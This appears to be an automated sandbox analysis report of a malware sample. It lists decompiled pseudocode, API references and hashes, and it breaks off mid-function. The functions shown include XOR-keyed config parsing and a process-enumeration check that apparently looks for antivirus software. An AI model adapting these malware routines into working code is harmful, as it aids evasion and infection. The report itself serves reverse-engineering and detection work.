Instruction Fuzzy Hash: E12167B0E14108EACF04EBE5DA51BDFB37DAB21344F504D64E412AA1C0EF709B84EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 02C9497C, Relevance: 1.5, APIs: 1, Instructions: 49
COMMON

Download Yara Rule

C-Code - Quality: 34%

			E02C9497C(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				char _v20;
				intOrPtr _t15;
				void* _t17;
				intOrPtr _t19;
				void* _t23;

				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x2c9d2a4; // 0x24aa5a8
				_t4 = _t15 + 0x2c9e39c; // 0x5148944
				_t20 = _t4;
				_t6 = _t15 + 0x2c9e124; // 0x650047
				_t17 = E02C959F9(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					_t23 = 8;
					if(_v20 != _t23) {
						_t23 = 1;
					} else {
						_t19 = E02C97E65(_t20, _v12);
						if(_t19 != 0) {
							 *_a16 = _t19;
							_t23 = 0;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}

0x02c94986
0x02c9498d
0x02c9498e
0x02c9498f
0x02c94990
0x02c94996
0x02c9499b
0x02c9499b
0x02c949a5
0x02c949b7
0x02c949be
0x02c949ec
0x02c949c0
0x02c949c2
0x02c949c7
0x02c949e9
0x02c949c9
0x02c949cc
0x02c949d3
0x02c949d8
0x02c949da
0x02c949da
0x02c949df
0x02c949df
0x02c949c7
0x02c949f3

APIs

Part of subcall function 02C959F9: SysFreeString.OLEAUT32(?), ref: 02C95AD8

Part of subcall function 02C97E65: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,02C91459,004F0053,00000000,?), ref: 02C97E6E
Part of subcall function 02C97E65: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,02C91459,004F0053,00000000,?), ref: 02C97E98
Part of subcall function 02C97E65: memset.NTDLL ref: 02C97EAC

SysFreeString.OLEAUT32(00000000), ref: 02C949DF

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeString$lstrlenmemcpymemset
String ID:
API String ID: 397948122-0
Opcode ID: e1aa78dd21fa0e09878f184e461fa71fbc6149cd1046c31f8d8dbf203bec1371
Instruction ID: c3699de7655e807b84d6d3593d78da9468ffcf37dbc225903b7b1461fce579f2
Opcode Fuzzy Hash: e1aa78dd21fa0e09878f184e461fa71fbc6149cd1046c31f8d8dbf203bec1371
Instruction Fuzzy Hash: 54017535500119BFDF259FA9CC09DABBBBDFB08350F020565E945E7160D3709E22C790

Uniqueness

Uniqueness Score: -1.00%

Function 02C927A2, Relevance: 1.3, APIs: 1, Instructions: 26
stringCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E02C927A2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E02C917D1(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E02C96517(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}

0x02c927aa
0x02c927c4
0x00000000
0x02c927e0
0x02c927bb
0x02c927c2
0x00000000
0x00000000
0x02c927e7

APIs

lstrlenW.KERNEL32(?,?,?,02C94133,3D02C9C0,80000002,02C986C4,02C92F48,74666F53,4D4C4B48,02C92F48,?,3D02C9C0,80000002,02C986C4,?), ref: 02C927C7

Part of subcall function 02C96517: SysAllocString.OLEAUT32(02C92F48), ref: 02C96530
Part of subcall function 02C96517: SysFreeString.OLEAUT32(00000000), ref: 02C96571

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: String$AllocFreelstrlen
String ID:
API String ID: 3808004451-0
Opcode ID: 61ff14114e76c098b2ffd5845fbf56f003296339c7ba2b71a4bf6ccb5a9b5480
Instruction ID: f278830cb372ddd793b3382fbeedfd14f11d8410525d124dcae42fca446bf2ed
Opcode Fuzzy Hash: 61ff14114e76c098b2ffd5845fbf56f003296339c7ba2b71a4bf6ccb5a9b5480
Instruction Fuzzy Hash: 77F0923200010EBFDF069F90DC49E9A3F6AAB08354F148015FE04540B0D773C6B1EBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02C9696A, Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 223
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E02C9696A(int* __ecx) {
				int _v8;
				void* _v12;
				void* __esi;
				signed int _t20;
				signed int _t25;
				char* _t31;
				char* _t32;
				char* _t33;
				char* _t34;
				char* _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				intOrPtr _t39;
				void* _t41;
				intOrPtr _t42;
				intOrPtr _t43;
				signed int _t46;
				intOrPtr _t49;
				signed int _t50;
				signed int _t55;
				void* _t57;
				void* _t58;
				signed int _t60;
				signed int _t64;
				signed int _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t85;
				intOrPtr _t102;

				_t86 = __ecx;
				_t20 =  *0x2c9d2a0; // 0x63699bc3
				if(E02C9A4D4( &_v12,  &_v8, _t20 ^ 0x8241c5a7) != 0 && _v8 >= 0x90) {
					 *0x2c9d2d4 = _v12;
				}
				_t25 =  *0x2c9d2a0; // 0x63699bc3
				if(E02C9A4D4( &_v12,  &_v8, _t25 ^ 0xecd84622) == 0) {
					_push(2);
					_pop(0);
					goto L60;
				} else {
					_t85 = _v12;
					if(_t85 == 0) {
						_t31 = 0;
					} else {
						_t80 =  *0x2c9d2a0; // 0x63699bc3
						_t31 = E02C97FC0(_t86, _t85, _t80 ^ 0x724e87bc);
					}
					if(_t31 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t31, 0,  &_v8) != 0) {
							 *0x2c9d240 = _v8;
						}
					}
					if(_t85 == 0) {
						_t32 = 0;
					} else {
						_t76 =  *0x2c9d2a0; // 0x63699bc3
						_t32 = E02C97FC0(_t86, _t85, _t76 ^ 0x2b40cc40);
					}
					if(_t32 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t32, 0,  &_v8) != 0) {
							 *0x2c9d244 = _v8;
						}
					}
					if(_t85 == 0) {
						_t33 = 0;
					} else {
						_t72 =  *0x2c9d2a0; // 0x63699bc3
						_t33 = E02C97FC0(_t86, _t85, _t72 ^ 0x3b27c2e6);
					}
					if(_t33 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x2c9d248 = _v8;
						}
					}
					if(_t85 == 0) {
						_t34 = 0;
					} else {
						_t68 =  *0x2c9d2a0; // 0x63699bc3
						_t34 = E02C97FC0(_t86, _t85, _t68 ^ 0x0602e249);
					}
					if(_t34 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t34, 0,  &_v8) != 0) {
							 *0x2c9d004 = _v8;
						}
					}
					if(_t85 == 0) {
						_t35 = 0;
					} else {
						_t64 =  *0x2c9d2a0; // 0x63699bc3
						_t35 = E02C97FC0(_t86, _t85, _t64 ^ 0x3603764c);
					}
					if(_t35 != 0) {
						_t86 =  &_v8;
						if(StrToIntExA(_t35, 0,  &_v8) != 0) {
							 *0x2c9d02c = _v8;
						}
					}
					if(_t85 == 0) {
						_t36 = 0;
					} else {
						_t60 =  *0x2c9d2a0; // 0x63699bc3
						_t36 = E02C97FC0(_t86, _t85, _t60 ^ 0x2cc1f2fd);
					}
					if(_t36 != 0) {
						_push(_t36);
						_t57 = 0x10;
						_t58 = E02C989D2(_t57);
						if(_t58 != 0) {
							_push(_t58);
							E02C95DDD();
						}
					}
					if(_t85 == 0) {
						_t37 = 0;
					} else {
						_t55 =  *0x2c9d2a0; // 0x63699bc3
						_t37 = E02C97FC0(_t86, _t85, _t55 ^ 0xb30fc035);
					}
					if(_t37 != 0 && E02C989D2(0, _t37) != 0) {
						_t102 =  *0x2c9d32c; // 0x51495b0
						E02C9804C(_t102 + 4, _t53);
					}
					if(_t85 == 0) {
						_t38 = 0;
					} else {
						_t50 =  *0x2c9d2a0; // 0x63699bc3
						_t38 = E02C97FC0(_t86, _t85, _t50 ^ 0x372ab5b7);
					}
					if(_t38 == 0) {
						L51:
						_t39 =  *0x2c9d2a4; // 0x24aa5a8
						_t18 = _t39 + 0x2c9e252; // 0x616d692f
						 *0x2c9d2d0 = _t18;
						goto L52;
					} else {
						_t49 = E02C989D2(0, _t38);
						 *0x2c9d2d0 = _t49;
						if(_t49 != 0) {
							L52:
							if(_t85 == 0) {
								_t41 = 0;
							} else {
								_t46 =  *0x2c9d2a0; // 0x63699bc3
								_t41 = E02C97FC0(_t86, _t85, _t46 ^ 0xd8dc5cde);
							}
							if(_t41 == 0) {
								_t42 =  *0x2c9d2a4; // 0x24aa5a8
								_t19 = _t42 + 0x2c9e791; // 0x6976612e
								_t43 = _t19;
							} else {
								_t43 = E02C989D2(0, _t41);
							}
							 *0x2c9d340 = _t43;
							HeapFree( *0x2c9d238, 0, _t85);
							L60:
							return 0;
						}
						goto L51;
					}
				}
			}

0x02c9696a
0x02c9696d
0x02c9698d
0x02c9699b
0x02c9699b
0x02c969a0
0x02c969ba
0x02c96bb8
0x02c96bba
0x00000000
0x02c969c0
0x02c969c0
0x02c969c7
0x02c969dd
0x02c969c9
0x02c969c9
0x02c969d6
0x02c969d6
0x02c969e7
0x02c969e9
0x02c969f3
0x02c969f8
0x02c969f8
0x02c969f3
0x02c969ff
0x02c96a15
0x02c96a01
0x02c96a01
0x02c96a0e
0x02c96a0e
0x02c96a19
0x02c96a1b
0x02c96a25
0x02c96a2a
0x02c96a2a
0x02c96a25
0x02c96a31
0x02c96a47
0x02c96a33
0x02c96a33
0x02c96a40
0x02c96a40
0x02c96a4b
0x02c96a4d
0x02c96a57
0x02c96a5c
0x02c96a5c
0x02c96a57
0x02c96a63
0x02c96a79
0x02c96a65
0x02c96a65
0x02c96a72
0x02c96a72
0x02c96a7d
0x02c96a7f
0x02c96a89
0x02c96a8e
0x02c96a8e
0x02c96a89
0x02c96a95
0x02c96aab
0x02c96a97
0x02c96a97
0x02c96aa4
0x02c96aa4
0x02c96aaf
0x02c96ab1
0x02c96abb
0x02c96ac0
0x02c96ac0
0x02c96abb
0x02c96ac7
0x02c96add
0x02c96ac9
0x02c96ac9
0x02c96ad6
0x02c96ad6
0x02c96ae1
0x02c96ae3
0x02c96ae6
0x02c96ae7
0x02c96aee
0x02c96af0
0x02c96af1
0x02c96af1
0x02c96aee
0x02c96af8
0x02c96b0e
0x02c96afa
0x02c96afa
0x02c96b07
0x02c96b07
0x02c96b12
0x02c96b20
0x02c96b2a
0x02c96b2a
0x02c96b31
0x02c96b47
0x02c96b33
0x02c96b33
0x02c96b40
0x02c96b40
0x02c96b4b
0x02c96b5e
0x02c96b5e
0x02c96b63
0x02c96b69
0x00000000
0x02c96b4d
0x02c96b50
0x02c96b55
0x02c96b5c
0x02c96b6e
0x02c96b70
0x02c96b86
0x02c96b72
0x02c96b72
0x02c96b7f
0x02c96b7f
0x02c96b8a
0x02c96b96
0x02c96b9b
0x02c96b9b
0x02c96b8c
0x02c96b8f
0x02c96b8f
0x02c96ba9
0x02c96bae
0x02c96bbb
0x02c96bbf
0x02c96bbf
0x00000000
0x02c96b5c
0x02c96b4b

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,02C95D85,?,63699BC3,02C95D85,?,63699BC3,00000005,02C9D00C,00000008,?,02C95D85), ref: 02C969EF
StrToIntExA.SHLWAPI(00000000,00000000,?,02C95D85,?,63699BC3,02C95D85,?,63699BC3,00000005,02C9D00C,00000008,?,02C95D85), ref: 02C96A21
StrToIntExA.SHLWAPI(00000000,00000000,?,02C95D85,?,63699BC3,02C95D85,?,63699BC3,00000005,02C9D00C,00000008,?,02C95D85), ref: 02C96A53
StrToIntExA.SHLWAPI(00000000,00000000,?,02C95D85,?,63699BC3,02C95D85,?,63699BC3,00000005,02C9D00C,00000008,?,02C95D85), ref: 02C96A85
StrToIntExA.SHLWAPI(00000000,00000000,?,02C95D85,?,63699BC3,02C95D85,?,63699BC3,00000005,02C9D00C,00000008,?,02C95D85), ref: 02C96AB7
HeapFree.KERNEL32(00000000,02C95D85,02C95D85,?,63699BC3,02C95D85,?,63699BC3,00000005,02C9D00C,00000008,?,02C95D85), ref: 02C96BAE

Strings

Uxt, xrefs: 02C96BAE

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: FreeHeap
String ID: Uxt
API String ID: 3298025750-1536154274
Opcode ID: 41ebfe882814fd182272df0c30f9502831321090e446f245e468a86ed76727ab
Instruction ID: 8f562845f7db95765869d4f5623889afbf3bc5c03265864171323a41022de72d
Opcode Fuzzy Hash: 41ebfe882814fd182272df0c30f9502831321090e446f245e468a86ed76727ab
Instruction Fuzzy Hash: DD61A471A50504AECF10FBB98E8CE5B77EEAB887447754E21E506E3184EB31DE51DB20

Uniqueness

Uniqueness Score: -1.00%

Function 02C97F56, Relevance: 6.0, APIs: 4, Instructions: 41
processCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E02C97F56() {
				char _v264;
				void* _v300;
				int _t8;
				intOrPtr _t9;
				int _t15;
				void* _t17;

				_t15 = 0;
				_t17 = CreateToolhelp32Snapshot(2, 0);
				if(_t17 != 0) {
					_t8 = Process32First(_t17,  &_v300);
					while(_t8 != 0) {
						_t9 =  *0x2c9d2a4; // 0x24aa5a8
						_t2 = _t9 + 0x2c9ee54; // 0x73617661
						_push( &_v264);
						if( *0x2c9d0fc() != 0) {
							_t15 = 1;
						} else {
							_t8 = Process32Next(_t17,  &_v300);
							continue;
						}
						L7:
						CloseHandle(_t17);
						goto L8;
					}
					goto L7;
				}
				L8:
				return _t15;
			}

0x02c97f61
0x02c97f6b
0x02c97f6f
0x02c97f79
0x02c97faa
0x02c97f80
0x02c97f85
0x02c97f92
0x02c97f9b
0x02c97fb2
0x02c97f9d
0x02c97fa5
0x00000000
0x02c97fa5
0x02c97fb3
0x02c97fb4
0x00000000
0x02c97fb4
0x00000000
0x02c97fae
0x02c97fba
0x02c97fbf

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 02C97F66
Process32First.KERNEL32(00000000,?), ref: 02C97F79
Process32Next.KERNEL32(00000000,?), ref: 02C97FA5
CloseHandle.KERNEL32(00000000), ref: 02C97FB4

Memory Dump Source

Source File: 00000004.00000002.722843315.0000000002C91000.00000020.00000001.sdmp, Offset: 02C90000, based on PE: true

Associated: 00000004.00000002.722820125.0000000002C90000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722890472.0000000002C9C000.00000002.00000001.sdmp Download File
Associated: 00000004.00000002.722908554.0000000002C9D000.00000004.00000001.sdmp Download File
Associated: 00000004.00000002.722933361.0000000002C9F000.00000002.00000001.sdmp Download File

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 740f5c52ea7825311d3635243e6565a28c6b30abd6c854a335c599d845ed8c1d
Instruction ID: cf9412210050bfb548a173cea9135a9de331282463d281f94b50c3051c73ec8d
Opcode Fuzzy Hash: 740f5c52ea7825311d3635243e6565a28c6b30abd6c854a335c599d845ed8c1d
Instruction Fuzzy Hash: CAF0F6725011156BDF20A6669D0DFEBB76DDFC5710F010252E90AE3004EB20CA5ACAB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1B0FE0, Relevance: 86.1, APIs: 47, Strings: 2, Instructions: 399COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1B0FEC
Mailbox.LIBCMTD ref: 6E1B1044
DName::isEmpty.LIBCMTD ref: 6E1B1054
operator+.LIBVCRUNTIMED ref: 6E1B1081
Mailbox.LIBCMTD ref: 6E1B108D
operator+.LIBVCRUNTIMED ref: 6E1B10A7
Mailbox.LIBCMTD ref: 6E1B10B3
DName::operator+.LIBCMTD ref: 6E1B1169
Mailbox.LIBCMTD ref: 6E1B1172
UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1B119B

Part of subcall function 6E1AE050: UnDecorator::getDecoratedName.LIBVCRUNTIMED ref: 6E1AE07B
Part of subcall function 6E1AE050: Mailbox.LIBCMTD ref: 6E1AE0C6

operator+.LIBVCRUNTIMED ref: 6E1B11AD

Part of subcall function 6E1A97C0: DName::operator+.LIBCMTD ref: 6E1A97E1

DName::operator+.LIBCMTD ref: 6E1B11C4

Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98B0
Part of subcall function 6E1A98A0: DName::operator+=.LIBCMTD ref: 6E1A98BD
Part of subcall function 6E1A98A0: Mailbox.LIBCMTD ref: 6E1A98C9

Mailbox.LIBCMTD ref: 6E1B11E3
DName::operator+.LIBCMTD ref: 6E1B121E
Mailbox.LIBCMTD ref: 6E1B1227
DName::operator+.LIBCMTD ref: 6E1B1463
Mailbox.LIBCMTD ref: 6E1B146C
DName::operator+.LIBCMTD ref: 6E1B11DA

Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9870
Part of subcall function 6E1A9860: Mailbox.LIBCMTD ref: 6E1A9888

DName::isEmpty.LIBCMTD ref: 6E1B1492
DName::operator=.LIBVCRUNTIMED ref: 6E1B14A0
DName::DName.LIBVCRUNTIMED ref: 6E1B14C4
DName::operator+.LIBCMTD ref: 6E1B14DA
DName::operator+.LIBCMTD ref: 6E1B14F0
Mailbox.LIBCMTD ref: 6E1B14F9
DName::operator=.LIBVCRUNTIMED ref: 6E1B1507
Mailbox.LIBCMTD ref: 6E1B1513

Strings

@, xrefs: 6E1B1487
-, xrefs: 6E1B10F0

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Mailbox$Name::operator+$Nameoperator+$DecoratedDecorator::getEmptyName::isName::operator=$Iterator_baseIterator_base::_Name::Name::operator+=std::_
String ID: -$@
API String ID: 625857421-1222683799
Opcode ID: 707e5df2ceee7ea3b9bca3a4243ab1c54ae098afc7475ad02c92e3c5e9ee4e2a
Instruction ID: d0b6617e1de200881504a3b66f17af66abc125a1ce263c627c2bd5a1038e18ed
Opcode Fuzzy Hash: 707e5df2ceee7ea3b9bca3a4243ab1c54ae098afc7475ad02c92e3c5e9ee4e2a
Instruction Fuzzy Hash: 8EF18475D002089BDB04CFE4EDA0FFE77B9AF55304F108569E216AA180EB716AC8DB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AF080, Relevance: 75.6, APIs: 42, Strings: 1, Instructions: 391COMMON

Download Yara Rule

APIs

operator+.LIBVCRUNTIMED ref: 6E1AF09F

Part of subcall function 6E1A97F0: DName::DName.LIBVCRUNTIMED ref: 6E1A97FD
Part of subcall function 6E1A97F0: DName::operator+.LIBCMTD ref: 6E1A9810

DName::DName.LIBVCRUNTIMED ref: 6E1AF0DD

Strings

), xrefs: 6E1AF10C

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: NameName::$Name::operator+operator+
String ID: )
API String ID: 308612335-2427484129
Opcode ID: 9d0f0d7096b379212abce378120d2f87f1a325e251c717cf0a36538330b28ba0
Instruction ID: 38de5fab5d89cb49b5966792ad770384b1c0dde294957f45d9a219e12328318a
Opcode Fuzzy Hash: 9d0f0d7096b379212abce378120d2f87f1a325e251c717cf0a36538330b28ba0
Instruction Fuzzy Hash: 3FE166B9D00108ABDB04DFE8EDA0AFE777DAF55304F208659E72597180EB31AAC4DB51

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A11D0, Relevance: 61.8, APIs: 41, Instructions: 290libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(6E21A358), ref: 6E1A11D9
GetProcAddress.KERNEL32(?,6E21A374), ref: 6E1A11EB
GetProcAddress.KERNEL32(?,6E21A380), ref: 6E1A1208
GetProcAddress.KERNEL32(?,6E21A388), ref: 6E1A1225
GetProcAddress.KERNEL32(?,6E21A394), ref: 6E1A1241
GetProcAddress.KERNEL32(?,6E21A3A0), ref: 6E1A125E
GetProcAddress.KERNEL32(?,6E21A3BC), ref: 6E1A127B
GetProcAddress.KERNEL32(?,6E21A3D0), ref: 6E1A1298
GetProcAddress.KERNEL32(?,6E21A3E0), ref: 6E1A12B5
GetProcAddress.KERNEL32(?,6E21A3F4), ref: 6E1A12D2
GetProcAddress.KERNEL32(?,6E21A408), ref: 6E1A12EF
GetProcAddress.KERNEL32(?,6E21A420), ref: 6E1A130C
GetProcAddress.KERNEL32(?,6E21A434), ref: 6E1A1329
GetProcAddress.KERNEL32(?,6E21A454), ref: 6E1A1346
GetProcAddress.KERNEL32(?,6E21A46C), ref: 6E1A1363
GetProcAddress.KERNEL32(?,6E21A484), ref: 6E1A1380
GetProcAddress.KERNEL32(?,6E21A498), ref: 6E1A139D
GetProcAddress.KERNEL32(?,6E21A4AC), ref: 6E1A13BA
GetProcAddress.KERNEL32(?,6E21A4C8), ref: 6E1A13D7
GetProcAddress.KERNEL32(?,6E21A4E8), ref: 6E1A13F4
GetProcAddress.KERNEL32(?,6E21A504), ref: 6E1A1411
GetProcAddress.KERNEL32(?,6E21A518), ref: 6E1A142E
GetProcAddress.KERNEL32(?,6E21A52C), ref: 6E1A144B
GetProcAddress.KERNEL32(?,6E21A53C), ref: 6E1A1468
GetProcAddress.KERNEL32(?,6E21A55C), ref: 6E1A1485
GetProcAddress.KERNEL32(?,6E21A578), ref: 6E1A14A2
GetProcAddress.KERNEL32(?,6E21A598), ref: 6E1A14BF
GetProcAddress.KERNEL32(?,6E21A5B4), ref: 6E1A14DC
GetProcAddress.KERNEL32(?,6E21A5CC), ref: 6E1A14F9
GetProcAddress.KERNEL32(?,6E21A5E8), ref: 6E1A1516
GetProcAddress.KERNEL32(?,6E21A604), ref: 6E1A1533
GetProcAddress.KERNEL32(?,6E21A618), ref: 6E1A1550
GetProcAddress.KERNEL32(?,6E21A630), ref: 6E1A156D
GetProcAddress.KERNEL32(?,6E21A64C), ref: 6E1A158A
GetProcAddress.KERNEL32(?,6E21A664), ref: 6E1A15A7
GetProcAddress.KERNEL32(?,6E21A680), ref: 6E1A15C4
GetProcAddress.KERNEL32(?,6E21A698), ref: 6E1A15E1
GetProcAddress.KERNEL32(?,6E21A6B0), ref: 6E1A15FE
GetProcAddress.KERNEL32(?,6E21A6C4), ref: 6E1A161B
GetProcAddress.KERNEL32(?,6E21A6D4), ref: 6E1A1638
GetProcAddress.KERNEL32(?,6E21A6E4), ref: 6E1A1655

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: AddressProc$HandleModule
String ID:
API String ID: 667068680-0
Opcode ID: 26ba28e3d9976b33afcdb058d7dd0df0ca1fff47e505ed31028f7679554abc5a
Instruction ID: 4f10a0a289a7c8f894eed0b7ae4d07eb4a0babd6459d9023e7f0bef3c579d11d
Opcode Fuzzy Hash: 26ba28e3d9976b33afcdb058d7dd0df0ca1fff47e505ed31028f7679554abc5a
Instruction Fuzzy Hash: 15C14EB5A00104EFEB289BA4C69CA6CBAB7FB45301F504569AB62DF385DF744F44CB60

Uniqueness

Uniqueness Score: -1.00%

Function 6E1A71A0, Relevance: 59.9, APIs: 31, Strings: 3, Instructions: 427COMMON

Download Yara Rule

APIs

___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7242
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A7252
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A725D
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A72BA
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A72C5
___vcrt_getptd.LIBVCRUNTIMED ref: 6E1A72D0
_Smanip.LIBCPMTD ref: 6E1A7342

Part of subcall function 6E1BD290: IsProcessorFeaturePresent.KERNEL32(00000017,?,?,6E1DC799,?,?,6E1B5367,?), ref: 6E1BD2D2

Is_bad_exception_allowed.LIBVCRUNTIMED ref: 6E1A72F9

Part of subcall function 6E1A8360: type_info::operator==.LIBVCRUNTIMED ref: 6E1A839D

___DestructExceptionObject.LIBCMTD ref: 6E1A730E
std::bad_alloc::bad_alloc.LIBCMTD ref: 6E1A731C

Part of subcall function 6E1A5B50: RaiseException.KERNEL32(E06D7363,00000001,00000003,?), ref: 6E1A5BEA

__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6E1A73CC
weak_ptr.LIBCPMTD ref: 6E1A7423
__FrameHandler3::HandlerMap::end.LIBVCRUNTIMED ref: 6E1A742F
__FrameHandler3::HandlerMap::iterator::operator++.LIBVCRUNTIMED ref: 6E1A7439
Concurrency::details::HardwareAffinity::operator!=.LIBCMTD ref: 6E1A7445
CatchIt.LIBCMTD ref: 6E1A74F3

Strings

csm, xrefs: 6E1A734A
csm, xrefs: 6E1A71F4
csm, xrefs: 6E1A7275

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: ___vcrt_getptd$FrameHandlerHandler3::$ExceptionMap::iterator::operator++$Affinity::operator!=CatchConcurrency::details::DestructFeatureHardwareIs_bad_exception_allowedMap::endObjectPresentProcessorRaiseSmanipstd::bad_alloc::bad_alloctype_info::operator==weak_ptr
String ID: csm$csm$csm
API String ID: 2369658663-393685449
Opcode ID: 278844731264d02cbf07a900c416ad94a082a9cc6b8cf4cc2e76c97842f2ade9
Instruction ID: f5c1b8ca4ca78d09febd6393c95dce325e8d81aa394a2420817d6b291b8623ca
Opcode Fuzzy Hash: 278844731264d02cbf07a900c416ad94a082a9cc6b8cf4cc2e76c97842f2ade9
Instruction Fuzzy Hash: 8FF160B9900209AFCB04CFEDD850AFE7779AF54304F10855AEA159B289DB30DAC5DBE1

Uniqueness

Uniqueness Score: -1.00%

Function 6E1AF9C0, Relevance: 44.0, APIs: 24, Strings: 1, Instructions: 243COMMON

Download Yara Rule

APIs

std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AF9CC
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AF9D4
DName::DName.LIBVCRUNTIMED ref: 6E1AFA34
std::_Iterator_base::_Iterator_base.LIBCPMTD ref: 6E1AFA44
operator+.LIBVCRUNTIMED ref: 6E1AFA6E
DName::operator+=.LIBCMTD ref: 6E1AFA94
DName::operator+=.LIBCMTD ref: 6E1AFA9E
Mailbox.LIBCMTD ref: 6E1AFAC2
DName::DName.LIBVCRUNTIMED ref: 6E1AFC1D
DName::DName.LIBVCRUNTIMED ref: 6E1B02F5
DName::setIsUDC.LIBCMTD ref: 6E1B0308
DName::isEmpty.LIBCMTD ref: 6E1B0312
operator+.LIBVCRUNTIMED ref: 6E1B0348
Mailbox.LIBCMTD ref: 6E1B0354
Mailbox.LIBCMTD ref: 6E1B0360

Strings

_, xrefs: 6E1AFA07

Memory Dump Source

Source File: 00000004.00000002.729258288.000000006E180000.00000020.00020000.sdmp, Offset: 6E180000, based on PE: false

Similarity

API ID: Iterator_baseIterator_base::_MailboxNameName::std::_$Name::operator+=operator+$EmptyName::isName::set
String ID: _
API String ID: 2065213285-701932520
Opcode ID: 8782a19ad13cd3f8b14014d3de551da5856167db2a91d482f62e0d61bead235e
Instruction ID: 7e7862d734cdf955840b87c6a74902c949fe26882aa9523f49765465c78087d4
Opcode Fuzzy Hash: 8782a19ad13cd3f8b14014d3de551da5856167db2a91d482f62e0d61bead235e
Instruction Fuzzy Hash: 72A1B374940208DFCF48DFE8D9A4AFD7BB9BF45304F008599E6059B290EB716AC5EB90

Uniqueness

Uniqueness Score: -1.00%

Function 02C92941, Relevance: 42.2, APIs: 23, Strings: 1, Instructions: 201
memorystringCOMMON

Download Yara Rule

C-Code - Quality: 66%

			E02C92941(long __eax, void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a12, void* _a16, void* _a24, intOrPtr _a32) {
				intOrPtr _v0;
				intOrPtr _v4;
				intOrPtr _v16;
				intOrPtr _v24;
				intOrPtr _v28;
				void* _v44;
				intOrPtr _v52;
				void* __edi;
				long _t25;
				intOrPtr _t26;
				intOrPtr _t27;
				intOrPtr _t28;
				intOrPtr _t29;
				intOrPtr _t30;
				void* _t33;
				intOrPtr _t34;
				int _t37;
				intOrPtr _t42;
